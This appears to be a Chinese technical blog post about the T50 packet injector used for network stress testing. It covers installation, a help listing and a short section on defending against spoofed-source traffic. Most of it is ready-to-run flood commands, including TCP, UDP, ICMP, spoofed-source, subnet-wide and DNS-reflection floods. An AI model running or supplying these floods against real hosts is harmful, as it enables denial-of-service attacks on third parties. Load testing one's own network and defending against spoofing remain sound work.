流量型压力测试工具之(一)T50(实测100G内网打流完全没效果,只能到200M,估计是姿势不对)

T50 Gitlab地址(kali自带,ubuntu19.10测试可以安装,现在版本是5.8.7)

    T50是一款网络压力测试工具,每秒发送令人难以置信的数据包,使其成为“首屈一指”的工具
    (在github上全线下架,下面是gitlab的项目地址)只支持ipv4不支持ipv6
    https://gitlab.com/fredericopissarra/t50
      __________ ________  _____
     |__    ___/|   ____/ /  _  \ the fastest packet injector.
       |    |   |____  \ /  /_\  \
       |    |   /       \\  \_/   \
       |____|  /________/\\_______/

T50是功能强大且独特的数据包注入器工具,它是唯一能够将协议(下面列出的协议)封装在通用路由封装协议(GRE)中的工具。

T50的主要区别在于,它能够使用一个SOCKET依次发送所有协议,并且能够修改网络路由,
从而使IT安全专业人员可以执行高级的“渗透测试”。

    ICMP-Internet控制消息协议
    IGMPv1-Internet组管理协议v1
    IGMPv3-Internet组管理协议v3
    TCP-传输控制协议
    EGP-外部网关协议
    UDP-用户数据报协议
    RIPv1-路由信息协议v1
    RIPv2-路由信息协议v2
    DCCP-数据报拥塞控制协议
    RSVP-资源保留协议
    GRE-通用路由封装
    IPSec-Internet协议安全性(AH / ESP)
    EIGRP-增强的内部网关路由协议
    OSPF-首先打开最短路径

ubuntu19.10 安装T50

    apt install gcc make -y
    wget https://gitlab.com/fredericopissarra/t50/-/archive/master/t50-master.tar.gz
    tar xf t50-master.tar.gz
    cd t50-master
    make && make install

攻击实例介绍(注意 --flood 与 --threshold 不能一起使用哦)

伪造随机源对 目标tcp 8099进行攻击
    t50 --flood --protocol TCP --dport 8099 ***.***.***.***
    #抓包查看
    #tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-flood-tcp-dport-8099.cap
    #数据包下载地址 https://pan.baidu.com/s/1DZdu3EHA1mlCquyXYfC0DQ    提取码:559l

伪造随机源对 目标udp 8099进行攻击
    t50 --flood --protocol UDP --dport 8099 ***.***.***.***
    #抓包查看
    #tcpdump -v -i enp1s0f1 udp and port 8099 -s 0 -w T50-flood-udp-dport-8099.cap
    #数据包下载地址 https://pan.baidu.com/s/1CsnEas__VStpjbwVlz-xKQ    提取码:cg7z

指定源ip(可随便指定,注意私网IP和127是不行的),对目标8099端口进行随机TCP flag攻击
    t50 --flood --protocol TCP --saddr 1.1.1.1 --dport ***.***.***.***
    #抓包查看
    #tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-saddr-tcp-dport-8099.cap
    #数据包下载地址 https://pan.baidu.com/s/1EMuIGjCHTaYhzI42n77gkQ    提取码:z7y4

伪造随机源对 目标的8099 进行 tcp fin flag攻击
    t50 --flood --protocol TCP --fin --dport 8099 *1*.*14.*1*.117
    #抓包查看
    #tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-flood-tcp-fin-dport-8099.cap
    #数据包下载地址 https://pan.baidu.com/s/1O8s49GI6yw_-kKve1Zozbw    提取码:85xw

伪造源对一个/29的网段进行TCP flag攻击
    t50 --flood --protocol TCP --dport 60991 ***.***.***.***/29

谈谈为什么会打出伪造源的攻击流量,以及如何防御

如何会能打出伪造源的攻击流量
根本原因:
网络是基于目的地址路由的(即路由器接口进入数据包后,读取数据包中的目的IP,然后查询路由表&转发表,进而将数据送出去,整个过程只查询了数据包的目的地址),为了实现数据包快速转发,实现大吞吐率,基本不会对来源IP进行验证,不是不能验证数据包中源IP的合法性,也不是不能拦截,只是互联网中部署得较少(我知道存在这个验证拦截的网络是HK CN2 网络)(对于这种网络技术,若是你有过海外IDC的经验,当你把你的IP向运营商广播时,你就知道,部分运营商网络存在 IP白名单的东西,基本就是这种限制了,你向它BGP广播的IP,你不去过白,那么你的这个IP流量是无法从他的线路上通过的,有的表项为可以ping,但是tcp,udp不能使用)

如何防御伪造源的流量攻击
    ISP运营商的做法
    IDC运营商的做法

user-bind static ip-address 38.21.230.4 interface 10GE2/0/19
ip source check user-bind enable

教科书的使用示例

# 随机源IP,对目标192.168.1.1 发起随机TCP flag攻击
    t50 --flood --protocol TCP 192.168.1.1

# 伪造固定源IP8.8.8.8,对目标192.168.1.1 发起随机TCP flag攻击
    t50 --flood --protocol TCP --saddr 8.8.8.8 192.168.1.1

# 固定源IP,固定TCP flag攻击
    t50 --flood --protocol TCP --fin --saddr 8.8.8.8 192.168.1.1
    t50 --flood --protocol TCP --syn --saddr 8.8.8.8 192.168.1.1
    t50 --flood --protocol TCP --rst --saddr 8.8.8.8 192.168.1.1
    t50 --flood --protocol TCP --psh --saddr 8.8.8.8 192.168.1.1
    t50 --flood --protocol TCP --ack --saddr 8.8.8.8 192.168.1.1

# 随机源IP,UDP攻击
    t50 --flood --protocol UDP 192.168.1.1

# 固定源IP,DNS攻击
    t50 --flood --protocol UDP --dport 53 192.168.1.1

# 随机源IP,DNS反射攻击
    t50 --flood --protocol UDP --sport 53 192.168.1.1

# 随机源IP,ICMP攻击
    t50 --flood --protocol ICMP 192.168.1.1

# 固定源IP,ICMP攻击
    t50 --flood --protocol ICMP --saddr 8.8.8.8 192.168.1.1

附详细参数介绍 (t50 -h)

Usage: t50 <host[/cidr]> [options]
Common Options:
    --threshold NUM           Threshold of packets to send     (default 1000)
    --flood                   This option supersedes the 'threshold'
    --encapsulated            Encapsulated protocol (GRE)      (default OFF)
 -B,--bogus-csum              Bogus checksum                   (default OFF)
    --shuffle                 Shuffling for T50 protocol       (default OFF)
 -q,--quiet                   Disable INFOs
    --turbo                   Extend the performance           (default OFF)
 -l,--list-protocols          List all available protocols
 -v,--version                 Print version and exit
 -h,--help                    Display this help and exit

GRE Options:
    --gre-seq-present         GRE sequence # present           (default OFF)
    --gre-key-present         GRE key present                  (default OFF)
    --gre-sum-present         GRE checksum present             (default OFF)
    --gre-key NUM             GRE key                          (default RANDOM)
    --gre-sequence NUM        GRE sequence #                   (default RANDOM)
    --gre-saddr ADDR          GRE IP source IP address         (default RANDOM)
    --gre-daddr ADDR          GRE IP destination IP address    (default RANDOM)

DCCP/TCP/UDP Options:
    --sport NUM               DCCP|TCP|UDP source port         (default RANDOM)
    --dport NUM               DCCP|TCP|UDP destination port    (default RANDOM)

TCP Options:
    --ack-seq NUM             TCP ACK sequence #               (default RANDOM)
    --sequence NUM            TCP SYN sequence #               (default RANDOM)
    --data-offset NUM         TCP data offset                  (default 5)
 -F,--fin                     TCP FIN flag                     (default OFF)
 -S,--syn                     TCP SYN flag                     (default OFF)
 -R,--rst                     TCP RST flag                     (default OFF)
 -P,--psh                     TCP PSH flag                     (default OFF)
 -A,--ack                     TCP ACK flag                     (default OFF)
 -U,--urg                     TCP URG flag                     (default OFF)
 -E,--ece                     TCP ECE flag                     (default OFF)
 -C,--cwr                     TCP CWR flag                     (default OFF)
 -W,--window NUM              TCP Window size                  (default NONE)
    --urg-pointer NUM         TCP URG pointer                  (default NONE)
    --mss NUM                 TCP Maximum Segment Size         (default NONE)
    --wscale NUM              TCP Window Scale                 (default NONE)
    --tstamp NUM:NUM          TCP Timestamp (TSval:TSecr)      (default NONE)
    --sack-ok                 TCP SACK-Permitted               (default OFF)
    --ttcp-cc NUM             T/TCP Connection Count (CC)      (default NONE)
    --ccnew NUM               T/TCP Connection Count (CC.NEW)  (default NONE)
    --ccecho NUM              T/TCP Connection Count (CC.ECHO) (default NONE)
    --sack NUM:NUM            TCP SACK Edges (Left:Right)      (default NONE)
    --md5-signature           TCP MD5 signature included       (default OFF)
    --authentication          TCP-AO authentication included   (default OFF)
    --auth-key-id NUM         TCP-AO authentication key ID     (default 1)
    --auth-next-key NUM       TCP-AO authentication next key   (default 1)
    --nop                     TCP No-Operation                 (default EOL)

IP Options:
 -s,--saddr ADDR              IP source IP address             (default RANDOM)
    --tos NUM                 IP type of service               (default 0x40)
    --id NUM                  IP identification                (default RANDOM)
    --frag-offset NUM         IP fragmentation offset          (default 0)
    --ttl NUM                 IP time to live                  (default 255)
    --protocol PROTO          IP protocol   T50|UDP|ICMP|TCP(default)

ICMP Options:
    --icmp-type NUM           ICMP type                        (default 8)
    --icmp-code NUM           ICMP code                        (default 0)
    --icmp-gateway ADDR       ICMP redirect gateway            (default RANDOM)
    --icmp-id NUM             ICMP identification              (default RANDOM)
    --icmp-sequence NUM       ICMP sequence #                  (default RANDOM)

EGP Options:
    --egp-type NUM            EGP type                         (default 3)
    --egp-code NUM            EGP code                         (default 3)
    --egp-status NUM          EGP status                       (default 1)
    --egp-as NUM              EGP autonomous system            (default RANDOM)
    --egp-sequence NUM        EGP sequence #
声明:本文为原创,作者为 辣条①号,转载时请保留本声明及附带文章链接:https://boke.wsfnk.com/archives/194.html
谢谢你请我吃辣条谢谢你请我吃辣条

如果文章对你有帮助,欢迎点击上方按钮打赏作者

最后编辑于:2023/3/9作者: 辣条①号

现在在做什么? 接下来打算做什么? 你的目标什么? 期限还有多少? 进度如何? 不负遇见,不谈亏欠!

暂无评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

arrow grin ! ? cool roll eek evil razz mrgreen smile oops lol mad twisted wink idea cry shock neutral sad ???

文章目录